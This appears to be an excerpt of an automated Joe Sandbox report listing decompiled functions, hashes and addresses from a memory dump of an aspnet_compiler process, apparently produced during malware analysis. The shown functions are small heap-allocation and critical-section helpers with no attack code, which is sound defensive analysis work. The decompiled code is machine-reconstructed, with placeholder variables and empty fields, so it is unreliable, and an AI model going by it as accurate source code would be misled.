Instruction Fuzzy Hash: 4BD0C235262A81CFD6568B1DC5A5B1577A4BB44B44FC50590EA018B662E628D944CA10

Uniqueness

Uniqueness Score: -1.00%

Function 012735A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012735A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0125EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x012735a1
0x012735a1
0x012735a5
0x012735ab
0x012735ab
0x012735b5
0x00000000
0x012735c1
0x012735b7

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: de13dbddd34fcd44500129da7d50dfc0efa73f7d9e475a66bf37d7f8341ff53a
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: CFD022B1431182DEEB42EF18E2187FE7BB3FF08208F582069C60206852C33A4A0EF700

Uniqueness

Uniqueness Score: -1.00%

Function 0124DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01264620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0124db4d
0x0124db54
0x0124db5f
0x0124db56
0x0124db56
0x0124db5c
0x0124db5c

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: dd16f0816d3ebbf725609b8d5a0b9ef7047da6fd3cdf60f142be1a36bdebb0ab
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F2C08C302A0A42AFEB262F20CD11B113AA4BB21B05F4400A06700DA0F0EB78DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 012CA537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CA537(intOrPtr _a4, intOrPtr _a8) {

				return L01268E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x012ca553

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 4dcafb65d772a94fd61caaa0bc1ae1f6b47c6657e29ad4af47266c2151347918
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D8C08C33080248BBCB126F81CC00F267F2EFBA4B60F008010FA480B5B0C632E9B0EB84

Uniqueness

Uniqueness Score: -1.00%

Function 01263A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01263A1C(intOrPtr _a4) {
				void* _t5;

				return L01264620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x01263a35

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f61eb5f1a1a22de9c9e3f1ae7c1464e5c1e09be50e1aedc1a224051d4685f9ba
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 8CC08C32080288BBC7126E41DC00F127B2DE7A0B60F000020BA040A5A08532ECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 0124AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124AD30(intOrPtr _a4) {

				return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0124ad49

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 2e993f87d00cd400e3541068ddf4c638018c050a7b779f98883f3b273f46682c
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 48C02B330D0248BBC7136F45DD00F117F2DE7A0B60F000020F6040B6B1C93AECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 012576E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012576E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x012576e4
0x00000000
0x012576f8
0x012576fd

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 2d68aa2716012ddcd972442401028a6c3ac80912781bd468396ce0c568c61f9f
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ECC08C701B11825EEB2B570CCE60B303A54AB08608F88019CAF01094E2C37CA802C218

Uniqueness

Uniqueness Score: -1.00%

Function 012736CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012736CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x012736d2
0x012736e8
0x012736d4
0x012736e5
0x012736e5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 5a5de09a2eb51eb868eea524d0cee719c7433e7c504a58380233ae8004d37ef0
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: F4C02B701B0480FFD7156F30CD50F267298F700A21F6403547320454F0D538DC00E104

Uniqueness

Uniqueness Score: -1.00%

Function 01267D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01267D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x01267d56
0x01267d5b
0x01267d60
0x01267d5d
0x01267d5d
0x01267d5d

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d6d1971a831c029f18041c7a7677c33e9c912c4afd3591480383c9a9c5f88a76
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 15B092353119418FDE16DF18C080B1533E8BB44A44F8404D0E400CBA21D329E8408900

Uniqueness

Uniqueness Score: -1.00%

Function 01272ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01272ACB() {
				void* _t5;

				return E0125EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01272adc

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 54d81b363ba12f90e377ebc0f4eaba69977323a44830056f305bab5a4d4f80c9
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: B2B01232C20441CFCF42EF40C650B2DB331FB00750F064490940127930C238AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01289950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction ID: 55b245c4774fff5bd31f3c32b53e250a69cb2030c1eb2a28898523b998e4aa1f
Opcode Fuzzy Hash: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction Fuzzy Hash: 2B9002A121144803D64065AD49046070005A7D0342F51C011A2054555ECA698C517275

Uniqueness

Uniqueness Score: -1.00%

Function 012899D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction ID: a27f95909fda4a06beefd5e3ec88be40720a5833e881babd37bd534f5e2aaa79
Opcode Fuzzy Hash: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction Fuzzy Hash: CD9002A122104442D60461AD45047060045A7E1241F51C012A2144554CC5698C617275

Uniqueness

Uniqueness Score: -1.00%

Function 01289820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction ID: d37564ca91ffb5b6f3000bc868ffb9ac75ef7c3a2bfc320cf41f78373ed07cb7
Opcode Fuzzy Hash: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction Fuzzy Hash: D390027125104802D64171AD45046060009B7D0281F91C012A0414554EC6958E56BBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0128B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction ID: 3292a8f28620182677fdf6b8c73a8441132875dff0ca23490809cded7454655e
Opcode Fuzzy Hash: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction Fuzzy Hash: 3C9002A1611184434A40B1AD49044065015B7E1341391C121A0444560CC6A88C55B3B5

Uniqueness

Uniqueness Score: -1.00%

Function 012898A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction ID: cc369f4d0b2b49a74958cc6483521319c10afffa143e0b561312284ba39113ad
Opcode Fuzzy Hash: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction Fuzzy Hash: 2C90026131104802D60261AD45146060009E7D1385F91C012E1414555DC6658D53B272

Uniqueness

Uniqueness Score: -1.00%

Function 01289B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction ID: fc89964f84dc1d1deedef3ade0044a462d13c483d2ccfdf8815ea04677e76577
Opcode Fuzzy Hash: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction Fuzzy Hash: 7B90026125104C02D64071AD85147070006E7D0641F51C011A0014554DC6568D6577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0128A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction ID: 2ea973bf63c1073a6dc101484a55d0777e7a3b1389bb8e4e542fb2ccc70c56d7
Opcode Fuzzy Hash: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction Fuzzy Hash: 9890027121148402D64071AD854460B5005B7E0341F51C411E0415554CC6558C56B371

Uniqueness

Uniqueness Score: -1.00%

Function 01289A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction ID: 3f3d4e4340ec6ca5b40dd7ea622566a1e52de60840261f53946de31568b8416c
Opcode Fuzzy Hash: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction Fuzzy Hash: C790027121144802D60061AD49087470005A7D0342F51C011A5154555EC6A5CC917671

Uniqueness

Uniqueness Score: -1.00%

Function 01289A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction ID: 6de7b09e11f4bde937728e77296bbb3770cfdeaf1a1e9dbcae4ee9d65d9125f0
Opcode Fuzzy Hash: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction Fuzzy Hash: 7D90026121148842D64062AD4904B0F4105A7E1242F91C019A4146554CC9558C557771

Uniqueness

Uniqueness Score: -1.00%

Function 01289520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction ID: 096516fbfd8d8627c4187fd63fdb0980958cbe97f129ae293f0b215069ba1cf2
Opcode Fuzzy Hash: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction Fuzzy Hash: FA9002E1211184924A00A2AD8504B0A4505A7E0241B51C016E1044560CC5658C51B275

Uniqueness

Uniqueness Score: -1.00%

Function 0128AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction ID: 6166040d7ab21a6747734362be701002537853d9c123606764d0cc97a0b57558
Opcode Fuzzy Hash: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction Fuzzy Hash: E3900271A1504412964071AD49146464006B7E0781B55C011A0504554CC9948E5573F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction ID: 35d6462f455225478e0400d43ca134b68c5169b83024af8bfe5c9e38cfb62d1a
Opcode Fuzzy Hash: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction Fuzzy Hash: 71900265231044020645A5AD070450B0445B7D6391391C015F1406590CC6618C657371

Uniqueness

Uniqueness Score: -1.00%

Function 012895F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction ID: 88ee441ebc56b42c6ec29b732888c388aa81bbf13d4167ac8ce6406e5a3c82d5
Opcode Fuzzy Hash: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction Fuzzy Hash: 3C90027121104C02D60461AD49046860005A7D0341F51C011A6014655ED6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 01289730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction ID: c02eb384e13b1a163e52b060ab297b892eafae536cc0147425fcf321b18e7e12
Opcode Fuzzy Hash: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction Fuzzy Hash: 8390026161504802D64071AD55187060015A7D0241F51D011A0014554DC6998E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0128A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction ID: 05ee7e136acb83989eaa4c5a6da42dd61bc8e9f033809b8e751e3b4db00ea7b4
Opcode Fuzzy Hash: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction Fuzzy Hash: 64900271311044529A00A6ED5904A4A4105A7F0341B51D015A4004554CC5948C617271

Uniqueness

Uniqueness Score: -1.00%

Function 01289760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction ID: c9fb50cc9406ee231df931c86ba8b2679a9a2fa5f985ead5ac4f3dae396ce760
Opcode Fuzzy Hash: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction Fuzzy Hash: 8090027121104803D60061AD56087070005A7D0241F51D411A0414558DD6968C517271

Uniqueness

Uniqueness Score: -1.00%

Function 01289770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction ID: 6ab0774e6f7e16d6a4968ba1b35f37d2a021952be789279c9fb48fbcdf7f9f67
Opcode Fuzzy Hash: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction Fuzzy Hash: 7590026121508842D60065AD5508A060005A7D0245F51D011A1054595DC6758C51B271

Uniqueness

Uniqueness Score: -1.00%

Function 0128A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction ID: 460e92a096b1efa66f0129c5603cedab66c699faf4fcd468090a0f2b65dcbe5c
Opcode Fuzzy Hash: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction Fuzzy Hash: 2C90027521508842DA0065AD5904A870005A7D0345F51D411A041459CDC6948C61B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction ID: bca8c70a8096396c2c5a38222073e7ae50ea156f6e52ca463383e97a30778008
Opcode Fuzzy Hash: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction Fuzzy Hash: 1390027161504C02D65071AD45147460005A7D0341F51C011A0014654DC7958E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction ID: e150d180d1b42b9c51731b0410115260570e76b926b6c729466ae51ccc16f187
Opcode Fuzzy Hash: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction Fuzzy Hash: 3A90027121508C42D64071AD4504A460015A7D0345F51C011A0054694DD6658D55B7B1

Uniqueness

Uniqueness Score: -1.00%

Function 012896D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction ID: 7be6b7cee0d34b7634e105b03a7e886bb4a5c25decebcc23522e5fee726d0185
Opcode Fuzzy Hash: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction Fuzzy Hash: 3D90027121104C42D60061AD4504B460005A7E0341F51C016A0114654DC655CC517671

Uniqueness

Uniqueness Score: -1.00%

Function 01289670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c1446ab3ffeb69ee43cb1c6bdfe0b14f3165f57da4655a3a49fea3960b9434fb
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 012DFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E012DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0128CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E012D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E012D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x012dfdda
0x012dfde2
0x012dfde5
0x012dfdec
0x012dfdfa
0x012dfdff
